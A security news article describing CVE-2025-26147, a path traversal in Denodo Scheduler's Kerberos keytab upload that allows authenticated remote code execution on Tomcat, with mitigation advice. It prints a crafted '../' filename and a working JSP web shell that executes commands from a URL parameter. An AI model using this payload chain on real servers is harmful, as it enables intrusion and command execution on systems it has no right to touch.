Critical Denodo Scheduler Flaw Allows Remote Code Execution by Attackers
Denodo, a provider of logical data management software, recently faced a critical security vulnerability in its Denodo Scheduler product.
This vulnerability, tracked as CVE-2025-26147, allows authenticated users to perform remote code execution (RCE) on affected systems, posing significant risks to organizations relying on this scheduling tool for data extraction and integration jobs.
Introduction to Denodo Scheduler and Its Vulnerability
Denodo Scheduler is a Java-based web application designed to automate and manage data extraction and integration tasks on Denodo Virtual DataPort servers.
It supports scheduling batch jobs, generating detailed execution reports, exporting results to various formats, and handling authentication configurations, including Kerberos authentication—a secure network protocol employing tickets and symmetric-key cryptography for authentication without passwords.
The vulnerability arises in the Scheduler’s feature that allows administrators to upload Kerberos keytab files for authentication.
Keytab files store encrypted service principal credentials, enabling passwordless authentication.
The HTTP request used for uploading these files is a multipart form data POST request, where the filename parameter in the Content-Disposition header is susceptible to a path traversal attack.
This attack manipulates the filename value using sequences like “../” to traverse directories and write files outside the intended upload directory.
For example, an attacker can craft a filename such as:
textfilename="../../../../opt/denodo/malicious.file.txt"
Although Denodo Scheduler appends a timestamp to the uploaded filename (e.g., malicious.file-1711156561716.txtThe exact filename is returned in the HTTP response, enabling attackers to locate the file without guessing the timestamp.
Exploiting the Vulnerability for RCE
With the ability to write arbitrary files anywhere on the server’s filesystem, attackers can escalate this vulnerability to achieve remote code execution.
The Denodo Scheduler runs on an Apache Tomcat server, a Java-based HTTP web server environment that executes JavaServer Pages (JSP).
Attackers can upload a malicious JSP web shell to the Tomcat web root directory, typically found at:
text/path/to/webroot/resources/apache-tomcat/webapps/ROOT/
A simple Java web shell example that executes commands passed via the HTTP GET parameter cmd is:
text<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
Process p = Runtime.getRuntime().exec(cmd);
java.io.InputStream is = p.getInputStream();
java.util.Scanner s = new java.util.Scanner(is).useDelimiter("\A");
String output = s.hasNext() ? s.next() : "";
response.getWriter().println(output);
}
%>
Once uploaded, this web shell allows remote execution of system commands by accessing the shell URL with the desired command, such as id to retrieve user identity information.
Technical Summary and Mitigation
| Aspect | Details |
|---|---|
| Vendor | Denodo |
| Product | Denodo Scheduler |
| Vulnerable Version | v8.0.202309140 |
| Fixed Version | Denodo 8.0 update: denodo-v80-update-20240307 |
| Vulnerability Type | Path Traversal leading to Authenticated Remote Code Execution (CVE-2025-26147) |
| Attack Vector | Multipart form data POST request uploading Kerberos keytab files with crafted filename |
| Affected Component | Kerberos authentication keytab file upload feature |
| Underlying Server | Apache Tomcat |
| Exploit Payload | Java JSP web shell allowing command execution via HTTP GET parameter |
| Mitigation | Upgrade to fixed Denodo Scheduler version; restrict file upload paths; validate filenames |
The vulnerability was responsibly disclosed by security researchers John De Armas and Morgan Backus, and Denodo responded promptly by releasing a security update to fix the issue.
This incident underscores how a seemingly minor flaw in file upload handling can escalate into a critical remote code execution vulnerability, threatening the confidentiality, integrity, and availability of enterprise data services.
It highlights the necessity of secure coding practices, rigorous input validation, and timely patching in software development and deployment.
Organizations using Denodo Scheduler are strongly advised to upgrade to the fixed version (denodo-v80-update-20240307) immediately and review their server configurations to prevent exploitation.
Staying informed through security advisories and following best practices in authentication and file handling remain vital defenses against such threats.
For ongoing updates and security research, follow Rhino Security Labs on Twitter and LinkedIn.
This article is based on detailed research and analysis by Rhino Security Labs and Denodo community documentation.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
Source link
